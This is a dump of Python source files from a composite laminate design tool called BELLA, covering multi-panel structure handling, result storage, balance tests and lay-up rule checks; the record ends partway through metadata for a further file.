"language": "Python",
"length_bytes": 15392,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 381,
"path": "/src/BELLA/multipanels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for a multi-panel structure\r\n\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.reduced_multipanels import ReducedMultiPanel\r\n\r\nclass MultiPanel():\r\n \"\"\"\r\n Class for multi-panel structures\r\n \"\"\"\r\n def __init__(self, panels, boundary_weights=None):\r\n \"\"\"Create object for storing multi-panel structures information\"\"\"\r\n\r\n # list of panels (classes)\r\n self.panels = panels\r\n if not isinstance(panels, list):\r\n raise MultiPanelDefinitionError(\r\n 'Attention, panels must be a list!')\r\n\r\n # total area of structure\r\n self.area = sum([el.area for el in panels])\r\n\r\n # total area for all patches\r\n self.area_patches = sum([el.area * el.n_plies for el in panels])\r\n\r\n # minimum ply count\r\n self.n_plies_min = min((el.n_plies for el in panels))\r\n\r\n # maximum ply count\r\n self.n_plies_max = max((el.n_plies for el in panels))\r\n self.is_thick_panels = [panel.n_plies == self.n_plies_max \\\r\n for panel in self.panels]\r\n\r\n # number of panels\r\n self.n_panels = len(panels)\r\n\r\n # number of plies in the laminates\r\n self.n_plies_in_panels = np.array([self.panels[ind_panel].n_plies \\\r\n for ind_panel in range(self.n_panels)])\r\n\r\n self.has_a_middle_ply()\r\n self.identify_one_thickest_panel()\r\n\r\n self.calc_panel_boundary_dict(panels, boundary_weights)\r\n\r\n def should_you_use_BELLA(self):\r\n \"\"\" Tells the user when using LAYLA is better than employing BELLA\r\n\r\n Displays a message when BELLA is employed to design a composite\r\n laminate structure with one panel to indicate that LAYLA is better\r\n suited for the task than BELLA.\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n\r\n if self.n_panels == 1:\r\n print(\"\"\"\r\nYou are using BELLA to design a composite laminate structure with one panel.\r\nLAYLA is better suited for this task than BELLA, please consider using LAYLA\r\ninstead of BELLA.\"\"\")\r\n\r\n def filter_target_lampams(self, constraints, obj_func_param):\r\n \"\"\"\r\n filters applied to the lamination parameters to account for orthotropy\r\n requirements\r\n \"\"\"\r\n for panel in self.panels:\r\n panel.filter_target_lampams(constraints, obj_func_param)\r\n\r\n def filter_lampam_weightings(self, constraints, obj_func_param):\r\n \"\"\"\r\n filter of the lamination-parameter weightings in the panel\r\n objective function to account for the design guidelines\r\n\r\n lampam_weightings_3: for blending steps 3 (contain penalty for\r\n out-of-plane orthotropy and may contain penalty for balance)\r\n lampam_weightings: for all other blending steps (contain penalty for\r\n out-of-plane orthotropy and does not contain penalty for balance)\r\n \"\"\"\r\n for panel in self.panels:\r\n panel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n def from_mp_to_blending_strip(self, constraints, n_plies_ref_panel=1):\r\n \"\"\"\r\n performs the blending step 2: maps the multi-panel structure to a\r\n blending strip, i.e. 
a series of panels in a row\r\n        \"\"\"\r\n        self.reduced = ReducedMultiPanel(self, constraints, n_plies_ref_panel)\r\n\r\n\r\n    def calc_panel_boundary_dict(self, panels, boundary_weights):\r\n        \"\"\"\r\n        checks that all panels have a different ID\r\n        collates all the panel boundaries in self.boundaries\r\n        checks that all panels are connected\r\n        \"\"\"\r\n        ## checks that all panels have a different ID\r\n        self.dict_ID_to_indices = dict()\r\n        for ind_panel, panel in enumerate(panels):\r\n            panel.ID_code = ind_panel\r\n            self.dict_ID_to_indices[panel.ID] = ind_panel\r\n        if len(self.dict_ID_to_indices) != self.n_panels:\r\n            raise MultiPanelDefinitionError(\"\"\"\r\nSeveral panels with the same index!\"\"\")\r\n#        print('dict_ID_to_indices', self.dict_ID_to_indices)\r\n\r\n        ## create the dictionary of panel boundaries\r\n        self.boundaries = []\r\n        for ind_panel, panel in enumerate(panels):\r\n            neighbours = [self.dict_ID_to_indices[neighbour] \\\r\n                          for neighbour in panel.neighbour_panels]\r\n            for elem in neighbours:\r\n                self.boundaries.append(np.sort([ind_panel, elem]))\r\n                self.boundaries.append(np.flip(np.sort([ind_panel, elem])))\r\n        if len(self.boundaries) == 0:\r\n            self.boundaries = np.array((), int).reshape((0,2))\r\n        else:\r\n            self.boundaries = np.unique(self.boundaries, axis=0)\r\n#        print('boundaries', self.boundaries)\r\n\r\n        ## checks that all panels are connected\r\n        visited_nodes = []\r\n        set_avail_nodes = set([0])\r\n        while len(set_avail_nodes) != 0 and len(visited_nodes) < self.n_panels:\r\n            current_node = set_avail_nodes.pop()\r\n            visited_nodes.append(current_node)\r\n            for elem in self.boundaries:\r\n                if elem[0] == current_node and elem[1] not in visited_nodes\\\r\n                and elem[1] not in set_avail_nodes:\r\n                    set_avail_nodes.add(elem[1])\r\n#        print('visited_nodes', visited_nodes)\r\n        if not len(visited_nodes) == self.n_panels:\r\n            raise MultiPanelDefinitionError(\"\"\"\r\nThe panels of the multipanel-component are not all connected!\"\"\")\r\n\r\n        if len(self.boundaries) == 0:\r\n            self.boundaries = np.array((), int).reshape((0,2))\r\n        else:\r\n            self.boundaries = np.unique(\r\n                np.array([np.sort(elem) for elem in self.boundaries]), axis=0)\r\n#        print('boundaries', self.boundaries)\r\n\r\n        ## dictionary with panel Ids\r\n        self.boundaries_in_IDs = np.empty((self.boundaries.shape[0], 2), int)\r\n        for ind_row, (first, second) in enumerate(self.boundaries):\r\n            self.boundaries_in_IDs[ind_row, 0] = self.panels[first].ID\r\n            self.boundaries_in_IDs[ind_row, 1] = self.panels[second].ID\r\n\r\n\r\n        ## reorganise the boundary weightings\r\n        self.boundary_weights_in_IDs = dict()\r\n        self.boundary_weights = dict()\r\n        if boundary_weights is not None:\r\n\r\n            for weight in boundary_weights.values():\r\n                if weight < 0:\r\n                    raise Exception(\r\n                        'The boundary weightings should be positive.')\r\n\r\n            if len(boundary_weights) < self.boundaries.shape[0]:\r\n                print(len(boundary_weights), self.boundaries)\r\n                raise Exception(\r\n                    'Insufficient number of boundary weightings.')\r\n\r\n            for ind_panel1, ind_panel2 in self.boundaries_in_IDs:\r\n                ind_panel1_mod = self.dict_ID_to_indices[ind_panel1]\r\n                ind_panel2_mod = self.dict_ID_to_indices[ind_panel2]\r\n                ind_panel1, ind_panel2 = sorted((ind_panel1, ind_panel2))\r\n                ind_panel1_mod, ind_panel2_mod = sorted((ind_panel1_mod,\r\n                                                         ind_panel2_mod))\r\n                weight = boundary_weights.get((ind_panel1, ind_panel2), None)\r\n                if weight:\r\n                    self.boundary_weights_in_IDs[\r\n                        (ind_panel1, ind_panel2)] = weight\r\n                    self.boundary_weights[\r\n                        (ind_panel1_mod, ind_panel2_mod)] = 
weight\r\n else:\r\n weight = boundary_weights.get(\r\n (ind_panel2, ind_panel1), None)\r\n if not weight:\r\n raise Exception('Missing boundary weightings.')\r\n self.boundary_weights_in_IDs[\r\n (ind_panel2, ind_panel1)] = weight\r\n self.boundary_weights[\r\n (ind_panel2_mod, ind_panel1_mod)] = weight\r\n\r\n else: # all boundary weightings set to one\r\n for ind_panel1, ind_panel2 in self.boundaries_in_IDs:\r\n ind_panel1_mod = self.dict_ID_to_indices[ind_panel1]\r\n ind_panel2_mod = self.dict_ID_to_indices[ind_panel2]\r\n ind_panel1, ind_panel2 = sorted((ind_panel1, ind_panel2))\r\n ind_panel1_mod, ind_panel2_mod = sorted((ind_panel1_mod,\r\n ind_panel2_mod))\r\n self.boundary_weights_in_IDs[(ind_panel1, ind_panel2)] = 1\r\n self.boundary_weights[(ind_panel1_mod, ind_panel2_mod)] = 1\r\n\r\n return 0\r\n\r\n def has_a_middle_ply(self):\r\n \"\"\"\r\n returns:\r\n - middle_ply_indices: the locations of middle plies per panel\r\n (0 if no middle ply)\r\n - has_middle_ply: True if one panel at least has a middle ply\r\n - thick_panel_has_middle_ply: True if thickest panel has a middle\r\n ply\r\n \"\"\"\r\n # locations of middle plies per panel (0 if no middle ply)\r\n self.middle_ply_indices = np.array(\r\n [self.panels[ind_panel].middle_ply_index \\\r\n for ind_panel in range(self.n_panels)])\r\n self.has_middle_ply = bool(sum(self.middle_ply_indices))\r\n\r\n if self.has_middle_ply and self.n_plies_max % 2:\r\n self.thick_panel_has_middle_ply = True\r\n else:\r\n self.thick_panel_has_middle_ply = False\r\n\r\n\r\n def calc_ply_drops(self, inner_step):\r\n \"\"\"\r\n returns a vector of the number of ply drops at each panel boundary of\r\n the blending strip for the inner_step-eme group of plies\r\n \"\"\"\r\n n_ply_drops = np.zeros((self.reduced.n_panels,), dtype='int16')\r\n for index, panel in enumerate(self.reduced.panels):\r\n n_ply_drops[index] = self.reduced.n_plies_per_group[inner_step] \\\r\n - panel.n_plies_per_group[inner_step]\r\n return n_ply_drops\r\n\r\n def calc_weight(self, density_area):\r\n \"\"\"\r\n returns the weight of the multipanel structure\r\n \"\"\"\r\n return density_area*sum([panel.area*panel.n_plies \\\r\n for panel in self.panels])\r\n\r\n def calc_weight_per_panel(self, density_area):\r\n \"\"\"\r\n returns the weight of the multipanel structure per panel\r\n \"\"\"\r\n self.weight_ref_per_panel = density_area * \\\r\n np.array([panel.area*panel.n_plies for panel in self.panels])\r\n\r\n def calc_weight_from_sst(self, sst, density_area):\r\n \"\"\"\r\n returns the weight of the multipanel structure from a stacking sequence\r\n table\r\n \"\"\"\r\n return density_area*sum([panel.area * sum(sst[ind_panel] != -1) \\\r\n for ind_panel,\r\n panel in enumerate(self.panels)])\r\n\r\n\r\n def identify_neighbour_panels(self):\r\n \"\"\"\r\n returns the indices of the neighbouring panels for each panel\r\n \"\"\"\r\n liste = []\r\n for ind_panel in range(self.n_panels):\r\n liste.append([])\r\n for boundary in self.boundaries:\r\n liste[boundary[0]].append(boundary[1])\r\n liste[boundary[1]].append(boundary[0])\r\n return liste\r\n\r\n\r\n def identify_one_thickest_panel(self):\r\n \"\"\"\r\n returns the index of one of the thickest panels\r\n \"\"\"\r\n for ind_panel, panel in enumerate(self.panels):\r\n if panel.n_plies == self.n_plies_max:\r\n self.ind_thick = ind_panel\r\n return 0\r\n raise Exception(\"\"\"\r\nThe maximum number of plies should be the ply count of a panel\"\"\")\r\n\r\n\r\n def identify_thickest_panels(self, sym=False):\r\n \"\"\"\r\n 
returns the index of all of the thickest panels\r\n        \"\"\"\r\n        liste = []\r\n        if sym and self.n_plies_max % 2 == 1: # middle ply in thickest panels\r\n            for ind_panel, panel in enumerate(self.panels):\r\n                if panel.n_plies == self.n_plies_max \\\r\n                or panel.n_plies == self.n_plies_max - 1:\r\n                    liste.append(ind_panel)\r\n        else:\r\n            for ind_panel, panel in enumerate(self.panels):\r\n                if panel.n_plies == self.n_plies_max:\r\n                    liste.append(ind_panel)\r\n        if liste:\r\n            return liste\r\n        raise Exception(\"\"\"\r\nThe maximum number of plies should be the ply count of a panel\"\"\")\r\n\r\n\r\n    def __repr__(self):\r\n        \" Display object \"\r\n\r\n        to_add = ''\r\n        # number of groups\r\n        if hasattr(self, 'n_groups'):\r\n            to_add = to_add + 'Number of groups : ' + str(self.n_groups) \\\r\n            + '\\n'\r\n        # number of plies per group for thickest laminates\r\n        if hasattr(self, 'n_plies_per_group'):\r\n            to_add = to_add + 'Max number of plies per group : ' \\\r\n            + str(self.n_plies_per_group) + '\\n'\r\n        # position of the group first plies for thickest laminates\r\n        if hasattr(self, 'n_first_plies'):\r\n            to_add = to_add + 'Position first plies : ' \\\r\n            + str(self.n_first_plies) + '\\n'\r\n\r\n        return f\"\"\"\r\nNumber of panels : {self.n_panels}\r\nMaximum number of plies in a panel: {self.n_plies_max}\r\nIndex of one of the thickest panels: {self.ind_thick}\r\nArea : {self.area}\r\nArea for all patches: {self.area_patches}\r\nPanel boundary matrix : {self.boundaries_in_IDs}\r\n\"\"\" + to_add\r\n\r\n\r\nclass MultiPanelDefinitionError(Exception):\r\n    \" Errors during the definition of a multi-panel structure\"\r\n\r\nif __name__ == \"__main__\":\r\n    print('*** Test for the class MultiPanel ***\\n')\r\n    constraints = Constraints(\r\n        sym=True,\r\n        dam_tol=False,\r\n        covering=False,\r\n        pdl_spacing=True,\r\n        min_drop=2)\r\n    parameters = Parameters(constraints=constraints, n_plies_ref_panel=48)\r\n    n_plies_target1 = 48\r\n    n_plies_target2 = 46\r\n    n_plies_target3 = 40\r\n    n_plies_target4 = 40\r\n    panel1 = Panel(ID=1,\r\n                   n_plies=n_plies_target1,\r\n                   constraints=constraints,\r\n                   neighbour_panels=[2])\r\n    panel2 = Panel(ID=2,\r\n                   n_plies=n_plies_target2,\r\n                   constraints=constraints,\r\n                   neighbour_panels=[1, 3])\r\n    panel3 = Panel(ID=3,\r\n                   n_plies=n_plies_target3,\r\n                   constraints=constraints,\r\n                   neighbour_panels=[2, 4])\r\n    panel4 = Panel(ID=4,\r\n                   n_plies=n_plies_target4,\r\n                   constraints=constraints,\r\n                   neighbour_panels=[3])\r\n    multipanel = MultiPanel([panel1, panel2, panel3, panel4])\r\n    print(multipanel)\r\n\r\n    from src.BELLA.divide_panels import divide_panels\r\n    divide_panels(multipanel, parameters, constraints)\r\n\r\n    print('multipanel.reduced.n_plies_in_panels', multipanel.reduced.n_plies_in_panels)\r\n    print('multipanel.calc_ply_drops(0)', multipanel.calc_ply_drops(0))\r\n    print('multipanel.reduced.n_plies_per_group', multipanel.reduced.n_plies_per_group)\r\n    print('multipanel.reduced.middle_ply_indices', multipanel.reduced.middle_ply_indices)"
},
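calc_panel_boundary_dict above ends by walking the boundary graph from panel 0 to verify that every panel is reachable. A standalone sketch of that connectivity check; the function name and inputs are illustrative, not BELLA's API:

    :::python
    def all_connected(n_panels, boundaries):
        # Build an adjacency map from the boundary pairs, then
        # flood-fill from panel 0 and check every panel was reached.
        adjacency = {i: set() for i in range(n_panels)}
        for a, b in boundaries:
            adjacency[a].add(b)
            adjacency[b].add(a)
        visited, frontier = set(), {0}
        while frontier:
            node = frontier.pop()
            visited.add(node)
            frontier |= adjacency[node] - visited
        return len(visited) == n_panels

    print(all_connected(3, [(0, 1), (1, 2)]))  # True
    print(all_connected(3, [(0, 1)]))          # False: panel 2 is isolated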
{
"alpha_fraction": 0.5907504558563232,
"alphanum_fraction": 0.5933682322502136,
"avg_line_length": 37.79166793823242,
"blob_id": "6ed7e2a249a243980e92485aab43b6926158b581",
"content_id": "da9370a5a85d725a088375a574aafa7bfbb5974f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5730,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 144,
"path": "/src/BELLA/results_with_one_pdl.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for the results of an optimisation with BELLA\r\nwith one initial ply-drop layout\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n#import sys\r\n#sys.path.append(r'C:\\BELLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\nclass BELLA_Results():\r\n \" An object for storing the results of an optimisation with BELLA\"\r\n\r\n def __init__(self, parameters, constraints, multipanel):\r\n \"Initialise the results of an optimisation with BELLA\"\r\n self.obj_constraints_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), dtype=float)\r\n self.obj_no_constraints_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_contig_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_diso_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_10_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_bal_ipo_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_oopo_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.n_contig_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=int)\r\n\r\n self.n_diso_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=int)\r\n\r\n self.n_obj_func_calls_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_last_level_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_after_ss_ref_repair_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_after_thick_to_thin_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_after_thin_to_thick_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_repaired_unique_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.lampam_tab_tab = np.zeros((\r\n multipanel.n_panels, parameters.n_ini_ply_drops, 12), float)\r\n\r\n self.n_plies_per_angle_tab = np.zeros((\r\n parameters.n_ini_ply_drops, multipanel.n_panels,\r\n constraints.n_set_of_angles), float)\r\n\r\n # Initialisation of the array storing all the best stacking sequence\r\n # solutions: ss_void\r\n ss_void = []\r\n for panel in multipanel.panels:\r\n ss_void.append(np.zeros((panel.n_plies,), dtype=int))\r\n # Initialisation of the array storing all the stacking sequence solutions:\r\n # ss_tab\r\n self.ss_tab = [[]]*(parameters.n_ini_ply_drops)\r\n for outer_step in range(parameters.n_ini_ply_drops):\r\n self.ss_tab[outer_step] = ss_void\r\n # Initialisation of the array storing all the stacking sequence tables:\r\n # ss_tab_tab\r\n if constraints.sym \\\r\n and multipanel.n_plies_max % 2 == 0 \\\r\n and sum([p.middle_ply for p in multipanel.panels]) != 0:\r\n self.ss_tab_tab = np.zeros((\r\n parameters.n_ini_ply_drops,\r\n multipanel.n_panels,\r\n multipanel.n_plies_max + 1), dtype=int)\r\n else:\r\n self.ss_tab_tab = np.zeros((\r\n parameters.n_ini_ply_drops,\r\n multipanel.n_panels,\r\n multipanel.n_plies_max), dtype=int)\r\n\r\n def update(self, outer_step, results_one_pdl):\r\n \"Update the results from an optimisation with one ply-drop layout\"\r\n self.ss_tab[outer_step] 
= results_one_pdl.ss\r\n self.ss_tab_tab[outer_step] = results_one_pdl.sst\r\n\r\n self.lampam_tab_tab[:, outer_step, :] = results_one_pdl.lampam\r\n\r\n self.obj_constraints_tab[\r\n outer_step] = results_one_pdl.obj_constraints\r\n self.obj_no_constraints_tab[\r\n outer_step] = results_one_pdl.obj_no_constraints\r\n\r\n self.penalty_diso_tab[\r\n outer_step] = results_one_pdl.penalty_diso\r\n self.penalty_contig_tab[\r\n outer_step] = results_one_pdl.penalty_contig\r\n self.penalty_10_tab[\r\n outer_step] = results_one_pdl.penalty_10\r\n self.penalty_bal_ipo_tab[\r\n outer_step] = results_one_pdl.penalty_bal_ipo\r\n self.penalty_oopo_tab[\r\n outer_step] = results_one_pdl.penalty_oopo\r\n self.n_diso_tab[outer_step] = results_one_pdl.n_diso\r\n self.n_contig_tab[outer_step] = results_one_pdl.n_contig\r\n\r\n self.n_plies_per_angle_tab[\r\n outer_step] = results_one_pdl.n_plies_per_angle\r\n\r\n self.n_obj_func_calls_tab[\r\n outer_step] = results_one_pdl.n_obj_func_calls\r\n self.n_designs_last_level_tab[\r\n outer_step] = results_one_pdl.n_designs_last_level\r\n self.n_designs_after_ss_ref_repair_tab[\r\n outer_step] = results_one_pdl.n_designs_after_ss_ref_repair\r\n self.n_designs_after_thick_to_thin_tab[\r\n outer_step] = results_one_pdl.n_designs_after_thick_to_thin\r\n self.n_designs_after_thin_to_thick_tab[\r\n outer_step] = results_one_pdl.n_designs_after_thin_to_thick\r\n self.n_designs_repaired_unique_tab[\r\n outer_step] = results_one_pdl.n_designs_repaired_unique\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f'''\r\nResults with BELLA:\r\n\r\n***\r\n'''\r\n"
},
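A side note on the initialisation pattern used throughout `BELLA_Results`: multiplying an array by `np.NaN` promotes the result to `float64`, so the `dtype=int` arguments passed to `np.ones` above have no lasting effect. A minimal stand-alone sketch of that NumPy behaviour (plain NumPy, independent of BELLA; `np.nan` is the same value as the `np.NaN` alias used in the class):

```python
import numpy as np

# NaN is a floating-point value, so multiplying an integer array by it
# promotes the whole array to float64; the requested int dtype is lost.
tab = np.nan * np.ones((3,), dtype=int)
print(tab.dtype)  # float64

# Entries filled in later are stored as floats until explicitly cast back.
tab[0] = 7
print(tab[~np.isnan(tab)].astype(int))  # [7]
```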
{
"alpha_fraction": 0.5586318969726562,
"alphanum_fraction": 0.5936481952667236,
"avg_line_length": 30.3157901763916,
"blob_id": "d1bf583742e26717a38a4f68e6fddc62ae78705c",
"content_id": "3c7fdccbad424acff2b8f7654accf1de805e6ba4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1228,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 38,
"path": "/src/guidelines/test_balance.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# - * - coding: utf - 8 - * -\r\n\"\"\"\r\nThis module tests the functions in balance.py.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pytest\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.guidelines.balance import is_balanced\r\nfrom src.guidelines.balance import calc_penalty_bal\r\n\r\[email protected](\r\n \"stack, constraints, expect\", [\r\n (np.array([0, 45, 90]), Constraints(), False),\r\n (np.array([0, 45, 90, -45]), Constraints(), True)\r\n ])\r\n\r\ndef test_is_balanced(stack, constraints, expect):\r\n output = is_balanced(stack, constraints)\r\n assert output == expect\r\n\r\[email protected](\r\n \"n_plies_per_angle, constraints, cummul_areas, expect\", [\r\n (np.array([0, 0, 1, 0]), Constraints(), 1, 1.),\r\n (np.array([0, 0, 2, 0]), Constraints(), 0.5, 0.5),\r\n (np.array([[0, 0, 2, 0],\r\n [0, 2, 2, 0]]), Constraints(), 1, np.array([1., 0.5]))\r\n ])\r\n\r\ndef test_calc_penalty_bal(\r\n n_plies_per_angle, constraints, cummul_areas, expect):\r\n output = calc_penalty_bal(n_plies_per_angle, constraints, cummul_areas)\r\n assert (output == expect).all()\r\n"
},
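For readers skimming the tests above: a lay-up is balanced when every +θ ply (0° and 90° plies excluded) is matched by a -θ ply, which is why `[0, 45, 90]` fails and `[0, 45, 90, -45]` passes. A simplified stand-in for `is_balanced` that reproduces those expected values (not the repository implementation, which works from a `Constraints` object):

```python
import numpy as np
from collections import Counter

def is_balanced_sketch(stack):
    """Balanced if each +theta ply has a -theta partner (0/90 excluded)."""
    counts = Counter(int(angle) for angle in stack if angle not in (0, 90))
    return all(counts[angle] == counts[-angle] for angle in counts)

print(is_balanced_sketch(np.array([0, 45, 90])))       # False: unpaired +45
print(is_balanced_sketch(np.array([0, 45, 90, -45])))  # True: +45/-45 pair
```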
{
"alpha_fraction": 0.5575239062309265,
"alphanum_fraction": 0.5909183621406555,
"avg_line_length": 35.761539459228516,
"blob_id": "c186cf2638dd1370a7fc2dc5e11566d28380b3e9",
"content_id": "789876a9cf608e8050fe0b341c90f965ece6ee0c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4911,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 130,
"path": "/src/guidelines/one_stack.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to check a design manufacturability\r\n\r\n- check_lay_up_rules\r\n checks the manufacturability of a stacking sequence list\r\n\r\n- check_ply_drop_rules\r\n checks the manufacturability of a stacking sequence table regarding\r\n the covering rule and the ply drop spacing rule\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.guidelines.contiguity import is_contig\r\nfrom src.guidelines.disorientation import is_diso_ss\r\nfrom src.guidelines.balance import is_balanced\r\nfrom src.guidelines.dam_tol import is_dam_tol\r\nfrom src.guidelines.ten_percent_rule import is_ten_percent_rule\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.CLA.lp_functions_2 import calc_lampamA\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.divers.pretty_print import print_ss, print_list_ss\r\n\r\ndef check_lay_up_rules(\r\n ss, constraints, no_ipo_check=False, no_bal_check=False,\r\n equality_45_135=False, equality_0_90=False, n_plies=None):\r\n \"\"\"\r\n checks the manufacturability of a stacking sequence\r\n \"\"\"\r\n if n_plies is not None and ss.size != n_plies:\r\n raise Exception(\"Wrong number of plies\")\r\n\r\n if constraints.dam_tol:\r\n if not is_dam_tol(ss, constraints):\r\n print_ss(ss)\r\n raise Exception(\"Damage tolerance constraint not satisfied\")\r\n\r\n if not no_bal_check and constraints.bal:\r\n if not is_balanced(ss, constraints):\r\n raise Exception(\"Balance constraint not satisfied\")\r\n\r\n if not no_ipo_check and constraints.ipo:\r\n lampamA = calc_lampamA(ss, constraints)\r\n if (abs(lampamA[2:4]) > 1e-10).any():\r\n print_ss(ss)\r\n print('lampamA', lampamA)\r\n# print('ipo')\r\n raise Exception(\"In plane orthotropy constraint not satisfied\")\r\n\r\n if constraints.diso:\r\n if hasattr(constraints, 'dam_tol_rule'):\r\n if not is_diso_ss(ss, constraints.delta_angle,\r\n constraints.dam_tol, constraints.dam_tol_rule):\r\n raise Exception(\"Disorientation constraint not satisfied\")\r\n else:\r\n if not is_diso_ss(ss, constraints.delta_angle,\r\n constraints.dam_tol, constraints.n_plies_dam_tol):\r\n raise Exception(\"Disorientation constraint not satisfied\")\r\n\r\n if constraints.contig:\r\n if not is_contig(ss, constraints.n_contig):\r\n raise Exception(\"Contiguity constraint not satisfied\")\r\n\r\n if constraints.rule_10_percent:\r\n if not is_ten_percent_rule(\r\n constraints, stack=ss,\r\n equality_45_135=equality_45_135,\r\n equality_0_90=equality_0_90):\r\n raise Exception(\"10% rule not satisfied\")\r\n return 0\r\n\r\ndef check_ply_drop_rules(reduced_sst, multipanel, constraints, reduced=True):\r\n \"\"\"\r\n checks the manufacturability of a stacking sequence table regarding\r\n the covering rule and the ply drop spacing rule\r\n\r\n reduced = True if the function is applied to the blending strip\r\n \"\"\"\r\n if constraints.covering:\r\n if (reduced_sst[:, 0] == -1).any() or (reduced_sst[:, -1] == -1).any():\r\n raise Exception(\"Covering constraint not satisfied\")\r\n\r\n if constraints.pdl_spacing:\r\n if reduced:\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=reduced_sst,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n else:\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=reduced_sst,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=False)\r\n if penalty_spacing:\r\n# 
print('penalty_spacing', penalty_spacing)\r\n# print_list_ss(reduced_sst[:, :reduced_sst.shape[1]])\r\n raise Exception(\"Ply drop spacing rule not satisfied\")\r\n return 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n print('\\n*** Test for the function check_lay_up_rules ***')\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n oopo=False,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=0,\r\n percent_90=10,\r\n percent_135=0,\r\n percent_45_135=10,\r\n diso=True,\r\n contig=True,\r\n n_contig=5,\r\n delta_angle=45,\r\n set_of_angles=np.array([0, 45, -45, 90]))\r\n ss = np.array([ 90, -45, 0, 45, 90, -45, 0, 45, 90, -45, 0, 45, 90,\r\n -45, 0, 45, 90, -45, 0, 45, 45, 0, 0, -45, 90, 90,\r\n 45, 45, 0, -45, -45, 90, 45, 0, -45, 90, 90, 45, 45,\r\n 0, 0, -45, 90, 90, 45, 0, 0, -45, -45, 90], float)\r\n check_lay_up_rules(ss, constraints)\r\n\r\n"
},
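`check_lay_up_rules` above delegates each guideline to a dedicated predicate (`is_contig`, `is_diso_ss`, `is_balanced`, `is_dam_tol`, ...). As an illustration of what the contiguity predicate has to establish, here is a stand-in sketch that caps runs of identical fibre orientations at `n_contig` plies (an assumed reading of the rule; the repository's `is_contig` may differ in detail):

```python
import numpy as np

def is_contig_sketch(stack, n_contig):
    """True if no more than n_contig consecutive plies share an orientation."""
    run = 1
    for previous, current in zip(stack[:-1], stack[1:]):
        run = run + 1 if current == previous else 1
        if run > n_contig:
            return False
    return True

print(is_contig_sketch(np.array([0, 0, 0, 45]), n_contig=2))  # False
print(is_contig_sketch(np.array([0, 0, 45, 0]), n_contig=2))  # True
```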
{
"alpha_fraction": 0.5773396492004395,
"alphanum_fraction": 0.6131629943847656,
"avg_line_length": 31.654205322265625,
"blob_id": "0f175623b895e896304f65db052ab5ead553591b",
"content_id": "2ebb91b4b95f420c756b6ed791dd2a0844b8ab6c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
